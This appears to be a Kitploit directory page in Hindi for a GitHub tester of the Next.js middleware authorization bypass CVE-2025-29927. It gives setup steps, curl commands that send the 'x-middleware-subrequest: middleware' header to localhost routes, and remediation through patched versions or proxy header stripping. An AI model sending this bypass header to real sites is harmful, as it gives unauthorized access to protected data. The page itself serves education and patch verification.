Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
claude-create-CVE-2025-29927 — CVE-2025-29927 के लिए Next.js मिडलवेयर प्राधिकरण बाईपास परीक्षक। x-middleware-subrequest हेडर शोषण का प्रदर्शन करता है और कमजोर अनुप्रयोगों को पैच करने के लिए सुधार मार्गदर्शन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/maronnjapan/claude-create-cve-2025-29927
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षालर्निंग और शिक्षा
GitHubmaronnjapan/claude-create-cve-2025-29927

claude-create-CVE-2025-29927

CVE-2025-29927 के लिए Next.js मिडलवेयर प्राधिकरण बाईपास परीक्षक। x-middleware-subrequest हेडर शोषण का प्रदर्शन करता है और कमजोर अनुप्रयोगों को पैच करने के लिए सुधार मार्गदर्शन प्रदान करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
1 साल पहलेअभी तक समीक्षित नहीं

Next.js Middleware Vulnerability Tester (CVE-2025-29927)

यह एप्लिकेशन Next.js मिडलवेयर प्राधिकरण बायपास भेद्यता (CVE-2025-29927) को प्रदर्शित करता है।

भेद्यता के बारे में

CVE-2025-29927 Next.js मिडलवेयर में एक प्राधिकरण बायपास भेद्यता है। एक विशेष रूप से तैयार किया गया HTTP हेडर (x-middleware-subrequest) भेजकर, एक हमलावर मिडलवेयर में लागू प्राधिकरण जांच को बायपास कर सकता है, संभावित रूप से संरक्षित संसाधनों तक पहुँच प्राप्त कर सकता है।

सेटअप निर्देश

  1. निर्भरताएँ स्थापित करें:

    root@kitploit:~
    cd /var/www/react-nextjs/test-middleware-skip
    npm install
    
  2. डेवलपमेंट सर्वर चलाएँ:

    root@kitploit:~
    npm run dev
    
  3. सर्वर http://localhost:3000 पर शुरू होगा

भेद्यता का परीक्षण

सामान्य पहुँच (ब्लॉक होनी चाहिए)

संरक्षित रूट तक सामान्य रूप से पहुँचने का प्रयास करें:

root@kitploit:~
npm run test-normal

या

root@kitploit:~
curl -v http://localhost:3000/protected-data

आपको 401 अनधिकृत प्रतिक्रिया मिलनी चाहिए, क्योंकि मिडलवेयर पहुँच को ब्लॉक करता है।

भेद्यता का शोषण

एक्सप्लॉइट हेडर के साथ संरक्षित रूट तक पहुँचने का प्रयास करें:

root@kitploit:~
npm run test-exploit

या

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/protected-data

यदि एप्लिकेशन असुरक्षित है, तो आपको संरक्षित डेटा के साथ 200 OK प्रतिक्रिया प्राप्त होगी।

API रूट का परीक्षण

सामान्य पहुँच (ब्लॉक होनी चाहिए):

root@kitploit:~
curl -v http://localhost:3000/api/protected

एक्सप्लॉइट के साथ:

root@kitploit:~
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

उपचार

इस भेद्यता को ठीक करने के लिए, आपको निम्नलिखित करना चाहिए:

  1. Next.js को पैच किए गए संस्करण में अपडेट करें:

    • Next.js 15.x: 15.2.3 या बाद के संस्करण में अपडेट करें
    • Next.js 14.x: 14.2.25 या बाद के संस्करण में अपडेट करें
    • Next.js 13.x: 13.5.9 या बाद के संस्करण में अपडेट करें
    • Next.js 12.x: 12.3.5 या बाद के संस्करण में अपडेट करें
  2. यदि आप अपडेट नहीं कर सकते, तो एक रिवर्स प्रॉक्सी (जैसे Nginx या Cloudflare) लागू करें जो इनकमिंग अनुरोधों से x-middleware-subrequest हेडर को हटा देता है।

अतिरिक्त परीक्षण कमांड

जाँचें कि क्या API रूट असुरक्षित है:

root@kitploit:~
# सामान्य अनुरोध (ब्लॉक होना चाहिए)
curl -v http://localhost:3000/api/protected

# एक्सप्लॉइट हेडर के साथ
curl -v -H "x-middleware-subrequest: middleware" http://localhost:3000/api/protected

अस्वीकरण

यह उपकरण केवल शैक्षिक और सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग यह सत्यापित करने के लिए करें कि आपके अपने Next.js एप्लिकेशन असुरक्षित हैं और पैचिंग की आवश्यकता है।

टूल डाउनलोड करें